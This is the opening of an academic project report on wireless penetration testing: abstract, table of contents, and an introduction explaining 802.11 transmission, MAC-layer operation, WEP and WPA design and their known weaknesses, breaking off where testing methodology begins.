ii ABSTRACT Wireless Penetration testing is a new discipline which is included within the
Transcript of ii ABSTRACT Wireless Penetration testing is a new discipline which is included within the
ii
ABSTRACT
Wireless Penetration testing is a new discipline which is included within the
information security field. This new discipline is an emerging field of study. The huge
adoption of wireless technologies over recent years has placed wireless data networks as
one of the major attack vectors for organizations nowadays. Incident handlers and law
enforcement have been forced to deal with the complexity associated with these
technologies when managing and responding to security incidents. Thus, the need of new
tools for identifying the exploits and vulnerabilities in a wireless environment has
increased in the past few years.
The purpose of this project is to conduct a wireless penetration test, and analyze
the software tools needed to conduct this test in a wireless network. By implementing a
testing methodology, the project is going to address different types of security flaws that
companies face while using wireless networks. Also, some common tests are going to be
discussed. Furthermore, the methodology used by the pen-tester to deploy these tests is
going to be addressed. Finally, after analyzing all the attacks deployed in the wireless
penetration test, security countermeasures will be discussed.
iii
TABLE OF CONTENTS
Abstract ............................................................................................................................... ii
Table of Contents............................................................................................................... iii
List of Figures .................................................................................................................... vi
List of Tables ................................................................................................................... viii
1. Introduction and Background ..................................................................................... 1
1.1 Wireless Local Networks.................................................................................... 4
1.1.1 Wireless Transmission Media..................................................................... 6
1.1.2 Wireless MAC layer ................................................................................... 9
1.1.3 IEEE 802.11 Protocols.............................................................................. 15
1.2 802.11 Security ................................................................................................. 18
1.2.1 Eavesdropping and Interference ............................................................... 18
1.2.2 Wired Equivalent Privacy ......................................................................... 21
1.2.3 Wi-Fi Protected Access............................................................................. 25
1.3 Wireless Penetration Testing ............................................................................ 26
1.3.1 Determining What Others Know .............................................................. 28
1.3.2 Mapping the Network ............................................................................... 29
1.3.3 Scanning the System................................................................................. 29
1.3.4 Performing a Vulnerability Assessment ................................................... 31
1.3.5 Penetrating the System.............................................................................. 31
2. Narrative ................................................................................................................... 40
2.1 Setting Up a Penetration Test Lab .................................................................... 41
iv
2.1.1 Isolating the Pent-test Lab ........................................................................ 41
2.1.2 Securing from Unauthorized Access ........................................................ 43
2.1.3 Managing Storage Devices ....................................................................... 44
2.2 Types of Penetration Test labs.......................................................................... 45
2.2.1 Virtual Pen-Test Lab................................................................................. 45
2.2.2 Internal Pen-Test Lab................................................................................ 46
2.2.3 External Pen-Test Lab............................................................................... 47
2.2.4 Project-Specific Pen-test lab ..................................................................... 48
2.2.5 Ad Hoc Lab............................................................................................... 49
2.3 Pen-Test Lab Description ................................................................................. 49
2.3.1 Hardware Description ............................................................................... 49
2.3.2 Software Description ................................................................................ 52
3. System Research ....................................................................................................... 62
3.1 External Pen-test lab ......................................................................................... 62
3.1.1 Cracking WEP .......................................................................................... 68
3.1.2 Cracking WPA-PSK ................................................................................. 73
3.2 Internal Pen-test lab .......................................................................................... 76
3.2.1 Enumeration Attacks................................................................................. 76
3.2.2 Denial of Service Attacks ......................................................................... 79
4. Evaluation and Results.............................................................................................. 81
4.1 External Pen-test lab ......................................................................................... 82
4.1.1 First Scenario ............................................................................................ 82
4.1.2 Second Scenario........................................................................................ 82
v
4.1.3 Third Scenario........................................................................................... 85
4.2 Internal Pen-Test lab ......................................................................................... 85
4.2.1 Vulnerability Assessment ......................................................................... 85
4.2.2 Denial of Service Attacks ......................................................................... 86
5. Future Work .............................................................................................................. 88
6. Conclusion ................................................................................................................ 90
Bibliography and References............................................................................................ 93
Appendix a – Disc Copy................................................................................................... 98
vi
LIST OF FIGURES
Figure 1.1 802.11 and the OSI Model .........................................................................................................5
Figure 1.2 Spectrum Use by FHSS and DSSS Technologies .....................................................................7
Figure 1.3 FHSS and DSSS interference coping strategies .......................................................................9
Figure 1.4 Four-way Handshake process .................................................................................................11
Figure 1.5 802.11 WLAN data packet structure ......................................................................................12
Figure 1.6 802.11 MAC Headers ................................................................................................................12
Figure 1.7 Wireless Local Area Network Protocols ................................................................................16
Figure 1.8 Secret Key and IV packets .......................................................................................................21
Figure 1.9 Wired Equivalent Privacy process ..........................................................................................22
Figure 1.10 Shared Key Authentication ...................................................................................................24
Figure 2.1 A Sample Internal Pen-test lab ................................................................................................47
Figure 2.2 A Sample External Pen-test Lab..............................................................................................48
Figure 2.3 Backtrack 3.0 Desktop ..............................................................................................................52
Figure 2.4 NetStumbler Main Screen ........................................................................................................54
Figure 2.5 Graphical representation of Signal Strength..........................................................................55
Figure 2.6 The Kismet Interface ................................................................................................................56
Figure 3.1 External Pen-test Lab ...............................................................................................................62
Figure 3.2 Access Point Broadcasting........................................................................................................63
Figure 3.3 Output of Netstumbler..............................................................................................................64
Figure 3.4 Access Point Broadcasting........................................................................................................65
Figure 3.5 Network Details .........................................................................................................................66
Figure 3.6 Airodump-ng Captures Packets...............................................................................................69
Figure 3.7 Aireplay-ng starting to inject packets .....................................................................................71
Figure 3.8 The packet replay’s attack .......................................................................................................72
Figure 3.9 Aircrack-ng displaying the Key ...............................................................................................73
Figure 3.10 shows the process of searching...............................................................................................75
Figure 3.11 Network Layout.......................................................................................................................76
vii
Figure 3.11 Nmap executing .......................................................................................................................77
viii
LIST OF TABLES
Table 1.1 Commonly Hacked Wireless Network Ports ...........................................................................30
Table 2.1 Intel PRO/Wireless 3945 802.11 a/b/g wireless card specifications ........................................50
Table 2.2 Access Point Specifications ........................................................................................................51
Table 2.3 Nmap Options and Scan Types .................................................................................................61
Table 3.1 Nmap Results ..............................................................................................................................77
Table 4.1 Cracking WEP ............................................................................................................................83
1
1. INTRODUCTION AND BACKGROUND
Wireless security requires slightly different thinking from wired security because
it gives potential attackers easy transport medium access. This access significantly
increases the threat that any security architecture must address [Arbaugh 2003]. Wireless
networking broadcast nature makes traditional link-layer attacks readily available to
anyone. Increasingly, companies and individuals are using wireless technology for
important communications they want to keep private, such as mobile e-commerce
transactions, email, and corporate data transmissions. At the same time, as wireless
platforms mature, grow in popularity, and store valuable information, hackers are
stepping up their attacks on these new targets. This is a particular problem because
wireless devices, including smart cellular phones and personal digital assistants (PDAs)
with internet access, were not originally designed with security as a top priority [Miller
2001].
Wireless networks have significantly impacted the world. Through the use of
them, information could be sent easily and quickly without the use of any wire. Wireless
networks provide all the functionality of wired networks without the physical constraints,
and configurations range from simple peer-to-peer to complex networks offering
distributed data connectivity and roaming. They also allow end-user mobility within a
networked environment and enable physical network portability which allows LANs to
move with users that make use of them. Furthermore, wireless networks can be used to
connect to the internet in countries and regions where the telecom infrastructure is poor
[Turnbull 2007].
2
Because of these advantages the use of wireless networks has been increased
dramatically on the past few years, changing not only how computers and electronic
devices interact, but also allowing for mass networking with little reliance on central
infrastructure and spontaneous communications. According to Andrew A. Vladimirov:
“by 2006 the number of shipped wireless networks hardware devices is estimated to
exceed 40 million units” [Vladimirov 2004].
With the prolific deployment of wireless networks in recent times, managing such
type of networks is particularly challenging due to the unreliable and often unprotected
nature of the wireless medium. The trade off for flexibility and mobility is more threats
from hackers using scanner to intercept data or gain access to the wireless network. These
threats are not the common security issues, such as spyware, weak passwords, and
missing patches. This type of networks introduces a new set of vulnerabilities from an
entirely different perspective that either much more difficult or completely impossible to
execute with a standard wired network [Siles 2007].
Wireless networks are more susceptible to attacks by outside forces via Internet
than wired LANs are. This technology has been misused in several ways; such as a
device for extortion and blackmail, as a mean of entry into private networks and systems
and as a means of telecommunication theft. As a result, wireless information security is
an emerging field of study and is becoming increasingly important as a means for
organizations to identify certain information security risks and abnormal network
behavior [Vladimirov 2004].
3
Although there are many methods of security assessment, such as audit trails and
template applications, the only way to truly know how secure a wireless network is by
testing it. “Wireless Penetration testing is the process of attempting to gain access to
resources without knowledge of usernames, passwords and other normal means of
access” [Stephen 2006]. The main objective of penetration testing is to identify all the
exploits and vulnerabilities that exist within an organization’s IT infrastructure and to
confirm the effectiveness of the security measures that have been implemented.
Furthermore, it helps to identify what is the information that is exposed to the public or
the Internet world, giving a bird-eye perspective on current security. More importantly,
penetration testing provides a blueprint for remediation in order to start or enhance a
comprehensive information protection strategy [ISS 2008].
In order to deploy a successfully penetration test, the penetration testing has to be
designed to model real world scenario as closely as possible. Attack scenarios can be
made up to best closely model all possible situations. Thus, the main thing that separates
a penetration tester from an attacker is permission. While most other auditing tends to
touch the surface of security, penetration testing is the most effective method as it is
“proof of concept” that the measures taken to secure the network are not effective
[Stephen 2006].
4
1.1 Wireless Local Networks
As mentioned before Wireless Local Area Networks (WLANs) provide
connectivity between electronic devices without the need for a physical connection. They
transmit and receive data over the air via RF technology combining data connectivity
with user mobility. They enable physical network portability, allowing LANs to move
with users that make use of them. Since WLANs eliminate the physical link to the
network, an office infrastructure may be peripatetic, and free to grow and move to suit
the needs of the organization because the network backbone is no longer hidden behind
walls and floors [Siles 2007].
Although the growth and pervasiveness of wireless appears to be inevitable, the
path and speed of growth of this technology is not so predictable. WLANs are unlikely to
replace traditional wired networks. “Wireless has not yet matured to the point of being
suitable for a data-intensive corporate environment. Also, to say that WLANs are
completely deployed without wires would not be strictly correct. Unless a piece of
equipment is battery-powered, there must be a power cable connection, and a typical
configuration has one or more fixed access points that are connected to a LAN via
traditional data cable” [Nichols 2002].
The access points broadcast to and receive information from wireless clients that
are within the transmission range. The transmission range of an access point varies
depending on the environment, length of the antenna, and the transmission power. In
environments with few obstacles the coverage area for a single access point can reach up
several hundred feet and support a small group of users without introducing noticeable
performance degradation [Turnbull 2007].
5
In its simplest form, a WLAN comprises a single transceiver, called an access
point. Access points, which serve as communication beacons, are connected to a wired
network via an Ethernet cable, and exist at fixed locations throughout the organization.
Network clients with a wireless adapter installed are able to facilitate data transfer from
client to access point. In order to extend a wireless network‘s range, more access points
need to be introduced near the coverage boundaries of previously deployed broadcast
units. Thus, overlapping cells at their perimeters allow clients to maintain a connection at
all times by moving from cell to cell [Zyren 2007].
The IEEE 802.11 is a set of standards for wireless local area network (WLAN)
computer communication, developed by the Institute of Electrical and Electronics
Engineers LAN/MAN Standards Committee in the 5GHz and 2.4 GHz public spectrum
bands. This set of standards is limited in scope to the Physical (PHY) layer and Medium
Access Control (MAC) sub-layer as shown in figure 1.1 [WildPackets 2008].
Figure 1.1 802.11 and the OSI Model [WildPackets 2008]
6
1.1.1 Wireless Transmission Media
Wireless LANs employ radio frequency (RF) and infrared (IR) electromagnetic
airwaves to transfer data from point to point. The 802.11 family of protocols define a
single MAC layer which interacts with three Physical layers [Nichols 2002].
Infrared
Infrared (IR) systems do not make for a practical enterprise WLAN solution and
therefore are not widely employed. IR is able to transfer data by taking advantage of
those frequencies located in close proximity to visible light on the electromagnetic
spectrum. The problem is that these high bands have the same limitations as visible light
in that they cannot penetrate nontransparent objects such as walls, floors, and ceilings. As
a result, WLANs transmitting via IR are restricted to operating within the same room
[Nichols 2002].
Wideband Radio Systems: Spread Spectrum
Originally deployed by the military, Spread spectrum techniques are methods by
which energy generated in a particular bandwidth is deliberately spread in the frequency
domain, resulting in a signal with a wider bandwidth thus, consuming more bandwidth in
exchange for reliability, integrity, and security of communications. These techniques let
devices avoid interference and other signal noise in a way not possible when using the
narrowband radio systems in which data is transmitted and received on a specific
frequency. However, the benefits come with a price. Wideband communications are
noisier and therefore easier to detect [Nichols 2002].
7
Spread spectrum comes in two forms: Frequency-Hopping Spread Spectrum and
Direct-Sequence Spread Spectrum. Of the two, frequency hopping is less costly to
deploy; however, direct-sequence has the potential for more widespread use since, it has
higher data rates, greater range, and a built-in error correction capability. The illustration
in Figure 1.1 of how frequency hopping and direct sequence systems use the spectrum is
more fully explained below [Chinitz 2007].
Figure 1.2 Spectrum Use by FHSS and DSSS Technologies [Chinitz 2007]
Frequency Hopping Spread Spectrum
Frequency Hopping Spread Spectrum (FHSS) is a “the method of transmitting
radio signals by rapidly switching a carrier among many frequency channels, using a
pseudorandom sequence known to both transmitter and receiver” [Chinitz 2007]. FHSS
transmissions can share a frequency band with many types of conventional transmissions
with minimal interference. In Figure 1.2 the FHSS side of the figure shows two different
hopping sequences and how they use different, small slices of the spectrum for short
periods of time.
8
For interference to occur, the conflicting narrowband signal would need to be
broadcast at the same frequency and at the same time as the hopping signal. Whenever
interference occurs, the devices can continue their data transfer by hopping to the next
frequency that is clear. Thus, interference does not break a connection, it makes
throughput to degrade gracefully [Nichols 2002].
Direct Sequence Spread Spectrum
Direct-Sequence Spread Spectrum (DSSS) is a method in which the transmitters
spread the signal over a frequency band that is wider than required to accommodate the
information signal by multiplying the data being transmitted by a pseudorandom
sequence of 1 and -1 value. The inserted bits are referred to as a chip or a chipping code.
By spreading the energy of the original signal into a much wider band, a receiver is able
to perform data recovery routines on signals based on statistical analysis. The ratio of
chips per bit is called the “spreading ratio”. A high spreading ratio increases the
resistance of the signal to interference [Chinitz 2007].
However, Direct-Sequence spread spectrum requires more bandwidth to operate,
generally using three non-overlapping frequencies to communicate. The error-correcting
capability prevents DSSS from needing to retransmit data that may have been corrupted
while en route. Even if one or more bits in the chip are damaged during transmission,
statistical techniques embedded in the ratio can recover the original data. In practice,
DSSS spreading ratios for wireless LANs are quite small. The DSSS portion of Figure
1.3 shows two separate DSSS channels accessing a wide bandwidth in a time static
manner [Chinitz 2007].
9
On the other hand, one of the clear advantages that Frequency Hopping Spread
Spectrum systems have over Direct-Sequence Spread Spectrum systems is their immunity
to interference. While, DSSS products spread their transmission power thinly across the
spectrum, FHSS network hop around the entire 2.4 GHz band. Low levels of interference
can easily overpower the DSSS transmission. Furthermore, Multi-channel DSSS products
use statically allocated pieces of the band. Interference in any significant piece of this
allocated band will interfere with the transmission, possibly destroying it entirely. This is
shown in figure 1.3 [Nichols 2002].
Figure 1.3 FHSS and DSSS interference coping strategies [Chinitz 2007]
1.1.2 Wireless MAC layer
The 802.11 family specifies a common medium access control (MAC) Layer,
which provides a variety of functions that support the operation of 802.11-based wireless
LANs. In general, the MAC Layer is in charge of managing and maintaining
communications between 802.11 stations (radio network cards and access points) by
coordinating access to a shared radio channel and utilizing protocols that enhance
communications over a wireless medium [WildPackets 2008].
10
The 802.11 set of standard defines two different access methods, the distributed
Coordination Function and the Point Coordination Function which simply uses the
Access Point as control system in wireless MAC. PCF has been implemented only in
very few hardware devices [WildPackets 2007].
The Distributed Coordination Function is a Carrier Sense Multiple Access with
Collision Avoidance mechanism (CSMA/CA). In CSMA, the process begins with a
station wishing to transmit first listening to the channel for a predetermined amount of
time so as to check for any activity on the channel. If the channel is sensed “idle” then the
station is permitted to transmit. Whenever the channel is sensed as “busy” the station has
to defer its transmission for a random interval with this the probability of collisions on
the channel are reduced [Nichols 2002].
Under CSMA/CA, devices use a four-way handshake to gain access to the
airwaves to solve the hidden node problem which occurs when two stations that cannot
hear from each other try to send packages to the access point at same time colliding as a
result of not been able to hear from each other. Four-way handshake ensures collision
avoidance by solving this problem [WildPackets 2007].
11
Figure 1.4 Four-way Handshake process [WildPackets 2007]
The Four-way handshake process starts with the source node sending short
Request To Send (RTS) packet addressed to the intended destination. If the intended
destination hears the transmission and is able to receive, it replies with a packet which is
named as short Clear to Send (CTS). Then, the source node sends the data, and the
recipient acknowledges all transmitted packets by returning a short acknowledgment
packet (ACK) for every transmitted packet received [WildPackets 2007].
Packet Structure and Packet Types
The 802.11 family of LAN protocols uses packets as a mean to send information
across the network. 802.11 networks have three basic types of packets: Data,
Management and Control packets. The data packet’s header carries all the functionality
of the protocol. Since RF technology and station mobility impose some complex
requirements on 802.11 WLAN networks. This added complexity is reflected in the long
physical layer convergence protocol (PLCP) headers as well as the data-rich MAC
header. The 802.11 packet structure is shown in figure 1.5 [WildPackets 2007].
12
Figure 1.5 802.11 WLAN data packet structure [WildPackets 2007]
Since 802.11 WLANs must be able to form and re-form their membership
constantly and also radio transmission conditions themselves can change, coordination
becomes a large issue in WLANs. Thus, management and control packets are mainly
dedicated to these condition functions. In addition, the headers of data packets contain
more information about network conditions and topology. Figure 1.6 bellow shows the
802.1 MAC headers [WildPackets 2007].
Figure 1.6 802.11 MAC Headers [WildPackets 2007]
13
In order to explain all the fields and the values that those fields may take in the
data header, a complete breakout of all the steps followed by all the devices trying to
connect and later on transmit information to a WLAN is described bellow. Furthermore, a
list with all the type of information 802.11 WLAN data packets headers convey, and the
types of information carried in management and control packets is addressed bellow.
The first step for a device in joining a BSS or IBSS is authentication. This can be
an open or a shared key system. If WEP encryption of packet data is enabled, shared key
authentication should be used. Authentication is handled by a request/response exchange
of management packets. The fields that are used are [WildPackets 2007]:
• Authentication ID: This is the name under which the current station
authenticated itself on joining the network.
• WEP Enabled: If this field is true, then the payload of the packet (but not the
WLAN headers) will be encrypted using Wired Equivalent Privacy.
The next step for a device joining a BSS or IBSS is to associate itself with the access
point. When roaming, a unit also needs to disassociate and re-associate. All these
functions are handled by an exchange of management packets. The current status is
shown in packet headers. The packet headers has the following fields: [WildPackets
2007]
• Association: A packet can show the current association of the sender. Association
is handled by request/response management packets. Also, disassociation is
handled with management packets and it is a simple declaration from either an
access point or a device.
14
• IBSSID or ESSID: The ID of the group or its access point. A device can only be
associated with one access point (shown by the ESSID) or IBSS at a time.
• Probe: Probes are supported by request/response management packets used by
roaming devices in search of a particular BSS or access point.
The 802.11 WLAN protocol supports rapid adjustment to changing conditions,
always seeking the best throughput. The fields that show this are [WildPackets 2007]:
• Channel: The channel or radio frequency used for the transmission.
• Data rate: The data rate used to transmit the packet.
• Fragmentation: The fragmentation done in 802.11 WLANs is completely
independent of any fragmentation imposed by higher level protocols such as
TCP/IP. This method of fragmentation has the basis of the fact that a series of
short transmissions is less vulnerable to interference in noisy environments. Thus,
fragmentation is dynamically set by the protocol in an effort to reduce the number
of retransmissions.
• Synchronization: The network management packets called “beacon” keep
members of a BSS synchronized.
• Power Save: Because wireless devices need to conserve power, the 8021.11
protocol uses a number of fields in data packets plus the PS-Poll (power save-
poll) control packet to let devices remain connected to the network while in power
save mode.
To ensure transmission of packets and the correct routing of them, the protocol uses
certain header fields and control packets. Those fields and control packets are:
15
• RTS, CTS, ACK: Control packets that are used in the four way handshake in
support of collision avoidance.
• Version: The version of the 802.11 protocol used in constructing the packet.
• Type and Sub-Type: The type of packet with a sub-type specifying its exact
function.
• Duration: A precise value for the time the packet should be allotted for the
reminder of the transaction of which this packet is a part.
• Length: Packet length.
• Retransmission: It is important to declare which packets are retransmissions.
• Sequence: Sequence information in packets helps reduce retransmissions.
• Order: Order of the packets.
• Addresses: There are four address fields in 802.11 WLAN data packets. This is
to accommodate the possibility of forwarding to, from, or through the distribution
system.
• To/From DS: Since traffic can be routed from a device using one access point to
a device using a different access point somewhere along the wired network.
1.1.3 IEEE 802.11 Protocols
According to the IEEE 802.11 set of standards for wireless local area network,
there are several protocols that define this type of networks. The first WLAN standard to
become accepted in the market was 802.11b, followed by 802.11g and 802.11n. Figure
1.7 shows the basic differences among these protocols [WildPackets 2007].
16
Figure 1.7 Wireless Local Area Network Protocols [Broadcom 2006]
802.11a
According to IEEE 802.11a, WLAN networks operate in the frequency band
marked as U-NII (Unlicensed National Information Infrastructure) which represents the
bands 5.15-5.25 GHz and are able to offer 54 Mbit/s as the maximum bit rate. 802.11a
specifies the physical layer for high bit rates, where the OFDM (Orthogonal Frequency
Division Multiplexing system is used as a basis. Since the 2.4 GHz band is heavily used,
using the 5GHz band gives this standard a significant advantage. However, using this
high frequency has the disadvantage of having less effective overall range than that of
802.11b/g. The reason is that 802.11a signals are absorbed more readily by walls and
other solid objects in their path [Zyren 2007].
17
802.11b
The IEEE 802.11b standard is a direct-sequence spread spectrum technology
(DSSS). Wireless data networks using this standard divide the frequency spectrum in
several channels that can be used to establish multiple non-overlapping communications.
802.11b has a maximum raw data of 11 Mbit/s. However, “due to the CSMA/CA
protocol overhead, in practice the maximum 802.11b throughput that an application can
achieve is about 5.9 Mbit/s using TCP and 7.1 Mbit/s using UDP” [Broadcom 2006].
Another problem is that 802.11b devices suffer interference from other products
operating in the 2.4 GHz band. Yet, with all these limitations 802.11b was the most
popular protocol for WLAN [Zyren 2007].
802.11g
In June 2003, the IEEE ratified 802.11g, which applied Orthogonal Frequency-
division multiplexing (OFDM) modulation to the 2.4 GHz band. This combined the best
of both worlds: raw data rates up to 54 Mbps on the same radio frequency as the already
popular 802.11b. Today, the vast majority of computer network hardware shipping
support 802.11g. Increasingly, as technology improves it is becoming easier to support
both 2.4 GHz and 5 GHz in the same chipset [Broadcom 2006].
18
802.11n
Although 802.11n it has not been ratified, the specifications on the 802.11n are
stable enough to Hardware makers start building Wi-Fi cards and routers. This standard
provides for a variety of optional modes and configurations that dictate different
maximum raw data rates. 802.11n improves the OFDM implementation upon the one
employed in the 802.11 a/g standards. This change improves the highest attainable raw
data rate to 65 Mbps [Broadcom 2006].
1.2 802.11 Security
The security of WLANs is very important, especially for applications hosting
valuable information. Since WLAN operates in the same manner as a wired LAN, they
harbor many of the same vulnerabilities as a wired LAN, plus some that are specific to
WLANs. The first threat is the potential for unauthorized parties to eavesdrop on radio
signal sent between a wireless station and an AP, compromising the confidentiality of
private information, the second is the unauthorized access in which an intruder tries to
enter a WLAN system disguised as authorized user. Another threat is interference and
jamming that can seriously degrade bandwidth [Arbaugh 2003].
1.2.1 Eavesdropping and Interference
“Eavesdropping is the act of surreptitiously listening to a private conversation. It
is a passive attack because an eavesdropper can listen to a message without altering the
data” [Kowalski 2006]. The sender and the receiver of the message may not be aware of
the intrusion [Kowalski 2006].
19
Furthermore, with a compatible receiver within the range of the transmission the
intruder can listen to the message, and since radio signals emitted from a WLAN can
propagate beyond the area, in which they originate, penetrate walls depending on the
strength of the signal, the intruder can be far away from the deployed WLAN [Kowalski
2006].
A second threat is the potential for an intruder to enter a WLAN system as an
authorized user without having the right permissions to do so. This attack is considered
an active attack, and can be carried out with a wireless adapter that is compatible with the
targeted network, or by using a compromised device that is linked to the network. A third
threat to WLAN security is radio interference that can seriously degrade bandwidth. In
many cases interference is accidental. Since 802.11b WLANs operates in the 2.4 GHz
radio frequency, other devices such as Bluetooth devices and cordless phone that operate
in the same frequency can overlap with WLAN traffic [Hassell 2004].
Of course, interference may also be intentional. An attacker with a powerful
transmitter can generate a radio signal stronger than the WLAN signals disrupting
communications. This is a condition known as jamming and is a denial-of-service attack.
Jamming equipment is readily available to consumers or can be constructed by
knowledgeable attackers. In addition, this type of attack can be done from a remote
location far from the targeted network [Bellardo 2003].
20
Although these threats can put in serious danger the security of a WLAN, there
are some countermeasures to lessen these threats. According to the IEEE 802.11 standard
WLANs use Spread-Spectrum technology to transmit data. As mentioned before Spread
Spectrum technology is designed to resist eavesdropping, interference and noise. Direct-
Sequence Spread Spectrum, which is the technique most commonly used, the
eavesdropper, must know the chipping code or code words (802.11b) [Vladimirov 2004].
Furthermore, the eavesdropper must also know the frequency band and
modulation techniques in order to accurately read the transmitted signal. Adding to an
eavesdropper’s difficulties is the fact that Spread-Spectrum technologies do not
interoperate with each other which means that a WLAN using FHSS cannot communicate
with WLAN using DSSS, and vice versa. Even if two different systems are using the
same technique, they cannot communicate if they are using different frequency bands. On
the other hand, Spread-Spectrum technology is only secure if the hopping pattern or
chipping code is unknown to the eavesdropper; however, these parameters are of public
knowledge because they are published in the 802.11 standard. Also, the modulation
method is specified. Using this information, a knowledgeable eavesdropper could build a
receiver to intercept and read unprotected signals [Chinitz 2007].
A solution to prevent third parties from compromising transmitted data is to use
encryption. Wired Equivalent Privacy (WEP) was the first encryption standard available
for wireless networks. The purpose of WEP is to ensure that WLAN systems have a
level of privacy that is equivalent to that of wired LANs by encrypting radio signals. A
secondary purpose of WEP is to prevent unauthorized users from accessing WLANs by
providing a method of authorization [Arbaugh-Shankar 2001].
21
1.2.2 Wired Equivalent Privacy
Wired Equivalent Privacy (WEP) uses a secret key that is shared between a
wireless station and an access point (AP). All data sent and received between a wireless
station and an AP are encrypted using this secret key. The 802.11 standard does not
specify how the secret key is established. However, it does allow for an array that
associates a unique key with each device. In most cases, however, one key is shared
among all stations and APs in a given system [Nichols 2002].
“WEP provides data encryption using a 40-bit or 128-bit secret key and uses the
stream cipher RC4 (Pseudo Random Number Generator) for confidentiality and the CRC-
32 checksum for integrity. Indeed, two processes are applied to plaintext data: one
encrypts the plaintext, and the other protects it from unauthorized modification while it is
in transit” [Nichols 2002]. The process starts with a secret key being concatenated with a
random initialization vector (IV) that adds 24 bits to the resulting key. Figure 1.8 shows
that the secret key (40 or 104 bit) and IV (always 24 bit) combined are used to encrypt
the data packets and checksum (CRC) [Tamini 2006].
Figure 1.8 Secret Key and IV packets [Tamini 2006]
22
This key is inserted into the RC4 cipher (PRNG) that generates a long pseudo-
random key stream. The sender uses the XOR operation to XORs the key stream with the
plaintext to generate encrypted text, or cipher text, and transmits it to the receiver along
with the IV. The receiver uses the IV and its own copy of the secret key to produce the
same key stream than the transmitter. Finally, the receiver XORs the key stream with the
cipher text to reveal the original plain text [Nichols 2002].
In order to protect the cipher text against unauthorized modification while in
transit, Wired Equivalent Privacy (WEP) applies an integrity check algorithm (CRC-32)
to the plain text. This second process will produce an Integrity Check Value (ICV). Then
it is concatenated to the plain text. The ICV is attached to the cipher text and sent to the
receiver along with the IV. The receiver compares the output ICV, which is the result of
applying the integrity algorithm to the plain text, to the transmitted ICV. If the two ICVs
match, the message is authenticated. Figure 1.9 illustrates WEP encryption and
decryption, respectively [Nichols 2002].
Figure 1.9 Wired Equivalent Privacy process [Tamini 2006]
23
Despite the potential strength of WEP for protecting the confidentiality and
integrity of data, it has limitations and flaws that can only be partially addressed by
proper management. The first problem stems from the reuse of Initialization Vector (IV).
The IV is included in the unencrypted part of the message so the receiver knows what IV
to use when generating the key stream for decryption. If the same IV is reused for
subsequent messages, an eavesdropper may be able to crypt-analyze the key stream
generated by the IV and secret key and thus decrypt messages that use that IV [Tamini
2006].
Reusing the IV potentially leads to another problem. Once, an attacker knows the
key sequence for an encrypted message, he can use this information to create a new
message. The attacker can transmit the message to the AP or wireless station, which
would accept it as a valid message. The 802.11 standard recommends changing the IV
after each transmission which can prevent both problems. However, since it is not
required, not many change frequently enough the value of the IV [Tamini 2006].
Although it is not a security issue, WEP encryption can reduce bandwidth in use.
The 40-bit encryption reduces bandwidth by 1 Mbps, and 128-bit encryption reduces
bandwidth by 1 to 2 Mbps. This degree of drop is relatively small, but users still notice it,
especially if the signal is transmitted via FHSS, which transmit signals at a maximum of
only 3 Mbps [Arbaugh 2003].
24
WEP also provides means to authenticate users trying to connect to an access
point. Basically, it has two types of authentication: “a default Open System, whereby all
users are permitted to access a WLAN, and shared key authentication, which controls
access to the WLAN and prevents unauthorized network access” [Nichols 2002]. Of the
two levels, shared key authentication is the secure mode. It works by sharing a secret key
among all stations and Access Points in a WLAN system. When a station tries to
associate with an AP, the AP replies back with random text by way of a challenge. The
station must use its copy of the shared secret key to encrypt the challenge text and send it
back to the AP in order to authenticate itself. The AP decrypts the response using the
same shared key and compares it to the challenge text sent earlier. If the text is identical,
the AP sends a confirmation message to the station and accepts the station into the
network. Figure 1.10 shows the shared key authentication process [Cam-Winget 2003].
Figure 1.10 Shared Key Authentication [WildPackets 2007]
25
Shared Key authentication works only if WEP encryption is enabled. If it is not
enabled, the system will default to the Open System mode, permitting almost any station
within range of an AP to access the network. The problem with this method of
authentication is the distribution of the key. Most WLANs share one key among all
devices and Access Points in the network. It is improbably that a key shared among many
users will remain secret indefinitely. A partial solution to this problem is to configure
wireless stations with a secret key themselves, rather than permitting end users to perform
this task. The problem of this solution is that still the shared key is stored on the users’
computers where it is vulnerable [Walker 2000].
In addition, if a key on even one station is compromised, all the other stations in
the system must be reconfigured with a new key. A better solution is to assign a unique
key to each station and to change them frequently. Furthermore, in many WLAN
systems, the key used for authentication is the same key used for encryption creating a
dual threat. The solution is to distribute separate keys throughout the system-one for
authentication and another for encryption [Walker 2000].
1.2.3 Wi-Fi Protected Access
Because of Wired Equivalency Protocol (WEP) has been found to be highly
flawed, to the serious detriment of its security claims and supporters, the Wi-Fi Alliance
industry group that promotes interoperability and security for the wireless LAN industry
created the Wi-Fi Protected Access (WPA) standard which was intended to replace WEP.
In addition, the IEEE 802.11i standard incorporates the WPA encryption method [Cam-
Winget 2003].
26
WPA allows for two kinds of security authentication types, WPA-802.1x (AKA
WPA-Enterprise) and WPA-PSK or (WPA-home). The first one uses a Remote
Authentication Dial-in User Service (RADIUS) server on the network. A RADIUS server
“is a certificate authenticator that only allows client stations to connect with the Access
Point (AP) if it sees a valid certificate on the client, which the server provided earlier”
[Housley 2003]. This use of WPA is generally for medium to large business, and is
generally not used in small office/home office (SOHO) environments [Housley 2003].
For SOHO environments WPA-PSK is a better choice. It uses a pass-phrase,
which is between 8 and 63 characters long. This pass-phrase is created and entered by the
user into any client station’s configuration utility, as well as into the AP. The way to
authenticate a user is through the Extensible Authentication Protocol (EAP). This
process leaves two considerations: the access point still needs to authenticate itself to the
client, and keys to encrypt the traffic need to be derived [Housley 2003].
1.3 Wireless Penetration Testing
As mentioned before, a penetration test offers an invaluable and compelling way
to establish a baseline assessment of security as seen from outside the boundaries the
organization’s network. If executed properly penetration tests provide evidence that
vulnerabilities do exist and that network penetrations are possible. More importantly,
they provide a blueprint for remediation in order to start or enhance a comprehensive
information protection strategy [INSIGHT 2008].
27
Penetration tests require certain key elements to be in place in order to ensure
useful, timely results. First, they must cover the full range of the threat spectrum, from
the presence of an antivirus engine to the more sophisticated vulnerabilities that might
enable denial of service attacks. Also, they must deliver clear, unambiguous results that
address both the technical and business objectives of the client. There exist
methodologies that the consultants need to follow. Furthermore, the most up-to-date
software should be used with the goal to gain maximum results with minimal disruption
to normal business operations [Beaver 2005].
The first step to deploy a penetration test is planning. There has to be a well
defined and ordered plan before start testing the wireless network for security
vulnerabilities. It is critical to plan everything in advance. This includes [Beaver 2005]:
• Permission to perform the tests from the boss, project sponsor, or client.
• Testing goals.
• Tests to run.
Ethical hacking is more than just running a wireless-network analyzer and scanning
for open ports. There are some formal procedures that should be incorporated into the
testing plan [Beaver 2005]. A well thought professional attack against a wireless network
is likely to flow in the following sequence [Vladimirov 2004]:
